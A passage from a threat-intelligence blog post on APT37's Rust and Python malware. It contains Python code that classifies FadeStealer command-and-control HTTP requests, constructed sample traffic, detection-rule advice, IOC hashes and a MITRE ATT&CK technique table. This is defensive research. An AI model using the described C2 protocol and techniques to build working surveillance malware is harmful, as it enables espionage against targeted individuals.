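    params = {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}
    ctype = req.headers.get("Content-Type", "").lower()
    if req.method == "POST":
        if "multipart/form-data" in ctype:
            # Field names from Content-Disposition; the lookbehind skips filename=.
            for name in re.findall(r'(?<![a-z])name="([^"]+)"', req.body):
                params.setdefault(name, "")
        else:
            for k, v in parse_qs(req.body, keep_blank_values=True).items():
                params.setdefault(k, v[0])
    return params


def classify_c2_request(req: HttpRequest) -> Optional[str]:
    """Label a request per Table 6, or None when it does not fit the grammar."""
    p = _params(req)
    if "U" not in p:
        return None
    if p["U"] == "parent":
        return "operator_fetch_results"      # GET/POST U=parent
    if req.method == "GET" and "C" in p:
        return "operator_issue_command"      # GET U=<id>&C=<b64 command>
    if req.method == "POST" and "R" in p:
        return "implant_post_result"         # POST U=<id>&R=<b64 result>
    if req.method == "POST" and "_file" in p:
        return "implant_upload_file"         # POST multipart with _file
    return "implant_poll"                    # U=<id> alone


def uses_fadestealer_boundary(req: HttpRequest) -> bool:
    """True when the multipart boundary is the literal FadeStealer uses."""
    m = re.search(r'boundary="?([^";]+)', req.headers.get("Content-Type", ""))
    return bool(m) and m.group(1) == MULTIPART_BOUNDARY


def decode_handshake(response_body: str) -> Optional[str]:
    """Return the decoded text when a reply is exactly the default handshake
    token, else None.  Note the token is four bytes: it decodes to "HELO"."""
    body = response_body.strip()
    if body != HANDSHAKE_B64:
        return None
    return base64.b64decode(body).decode("ascii")


def triage(requests: List[HttpRequest]) -> List[Tuple[str, str, Optional[str]]]:
    """(method, url, label) for every request, unrelated ones labelled None."""
    return [(r.method, r.url, classify_c2_request(r)) for r in requests]


_UPLOAD_BODY = (  # constructed multipart body in FadeStealer's layout
    "--myboundary\r\n"
    'Content-Disposition: form-data; name="U"\r\n\r\nPC-01\r\n'
    "--myboundary\r\n"
    'Content-Disposition: form-data; name="_file"; filename="watch_2024_11_22-10_00_00.rar"\r\n'
    "Content-Type: application/octet-stream\r\n\r\n<rar bytes>\r\n"
    "--myboundary--\r\n"
)
_FORM = {"Content-Type": "application/x-www-form-urlencoded"}
SAMPLE_TRAFFIC = [  # constructed, not a real capture
    HttpRequest("GET", "/up.php?U=parent"),
    HttpRequest("GET", "/up.php?U=PC-01&C=QUJD"),
    HttpRequest("POST", "/up.php", _FORM, "U=PC-01&R=QUJD"),
    HttpRequest("POST", "/up.php", {"Content-Type": "multipart/form-data; boundary=myboundary"}, _UPLOAD_BODY),
    HttpRequest("POST", "/up.php", _FORM, "U=PC-01"),
    HttpRequest("GET", "/index.php?page=1"),
]

if __name__ == "__main__":
    for method, url, label in triage(SAMPLE_TRAFFIC):
        print(f"{method:4} {url:28} {label}")
```

Two points worth keeping in mind when turning this into a detection rule. First, a parameter named U on its own is weak evidence; the combination with C, R or _file, the fixed boundary string, and an HTTP reply consisting solely of the handshake token are the discriminating features. Second, check the token rather than its claimed meaning: SEVMTw== decodes to the four bytes HELO, so a rule that searches response bodies for the string HELLO would miss it, which is why decode_handshake matches on the encoded form.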
Victim Profile

Our findings revealed that several victims of this attack were located in South Korea. While the exact identities of the victims remain unclear due to limited available information, they do not appear to be associated with enterprises or government organizations. Based on the decoy content employed in the attack, ThreatLabz assesses with medium confidence that the intended targets include individuals linked to the North Korean regime or involved in South Korean political and/or diplomatic affairs.

Conclusion

APT37 continues to prove its adaptability and proficiency by utilizing advanced tools and tactics to achieve its objectives. By incorporating new technologies alongside refined social engineering techniques, the group is able to effectively exfiltrate sensitive information and conduct targeted surveillance on individuals of interest. This malware cluster leveraged by APT37 has demonstrated persistent activity over the years and continues to undergo regular improvements.

Zscaler Coverage

Zscaler's multilayered cloud security platform detects indicators related to APT37's campaign at various levels.
The figure below depicts the Zscaler Cloud Sandbox, showing detection details for this threat.

Figure 4: Zscaler Cloud Sandbox report for FadeStealer.

In addition to sandbox detections, Zscaler's multilayered cloud security platform detects indicators related to this threat at various levels with the following threat names:
- Win32.Backdoor.Chinotto
- Win32.Trojan.Apt37.LZ
- Win32.Downloader.FadeStealer

Indicators Of Compromise (IOCs)

| MD5 | File name |
|---|---|
| b9900bef33c6cc9911a5cd7eeda8e093 | N/A |
| 7967156e138a66f3ee1bfce81836d8d0 | 3HNoWZd.exe.bin |
| 77a70e87429c4e552649235a9a2cf11a | wonder.dat |
| 04b5e068e6f0079c2c205a42df8a3a84 | tele.conf |
| d2b34b8bfafd6b17b1cf931bb3fdd3db | tele.dat |
| 3d6b999d65c775c1d27c8efa615ee520 | 2024-11-22.rar |
| 89986806a298ffd6367cf43f36136311 | Password.chm |
| 4caa44930e5587a0c9914bda9d240acc | 1.html |

MITRE ATT&CK Framework

| ID | Tactic | Description |
|---|---|---|
| T1566.001 | Phishing: Spearphishing Attachment | The threat actor delivers a malicious archive file to victims via spear phishing. |
| T1059.003 | Command and Scripting Interpreter: Windows Command Shell | The Windows commands are launched by the CHM file when the Chinotto malware is delivered to the victim. |
| T1059.007 | Command and Scripting Interpreter: JavaScript | The JavaScript-embedded HTA file is launched at the initial stage of the infection. |
| T1053.005 | Scheduled Task/Job: Scheduled Task | A Windows Task Scheduler entry named MicrosoftUpdate was created for persistence using a malicious shortcut file. |
| T1204.001 | User Execution: Malicious Link | The malicious Windows shortcut file was delivered to the victim. |
| T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | The malicious CHM file creates a Run registry key named OnedriveStandaloneUpdater for persistence. |
| T1055.013 | Process Injection: Process Doppelgänging | Using Python code, the malware injects malicious code into a legitimate process using Windows Transactional NTFS (TxF). |
| T1036.003 | Masquerading: Rename Legitimate Utilities | The legitimate Python module was renamed as tele_update.exe. |
| T1036.004 | Masquerading: Masquerade Task or Service | The malware creates Windows services or registry keys that impersonate legitimate services, such as OneDrive or Windows Update. |
| T1218.005 | System Binary Proxy Execution: Mshta | The malware exploits mshta.exe to execute malicious .hta files as a proxy. |
| T1056.001 | Input Capture: Keylogging | FadeStealer collects the user's keystrokes. |
| T1113 | Screen Capture | FadeStealer takes screenshots of the victim's screen. |
| T1123 | Audio Capture | FadeStealer records microphone audio. |
| T1025 | Data from Removable Media | FadeStealer collects files from connected removable media devices. |
| T1560.001 | Archive Collected Data: Archive via Utility | FadeStealer uses an embedded RAR utility to collect and compress data for exfiltration. |
| T1071.001 | Application Layer Protocol: Web Protocols | Rustonotto, Chinotto, and FadeStealer use HTTP communication for backdoor operations. |
| T1132.001 | Data Encoding: Standard Encoding | Rustonotto and Chinotto use Base64 encoding when sending data. |
| T1041 | Exfiltration Over C2 Channel | FadeStealer exfiltrates collected data through the C2 channel. |
The post APT37 Targets Windows with Rust Backdoor and Python Loader appeared first on Security Boulevard.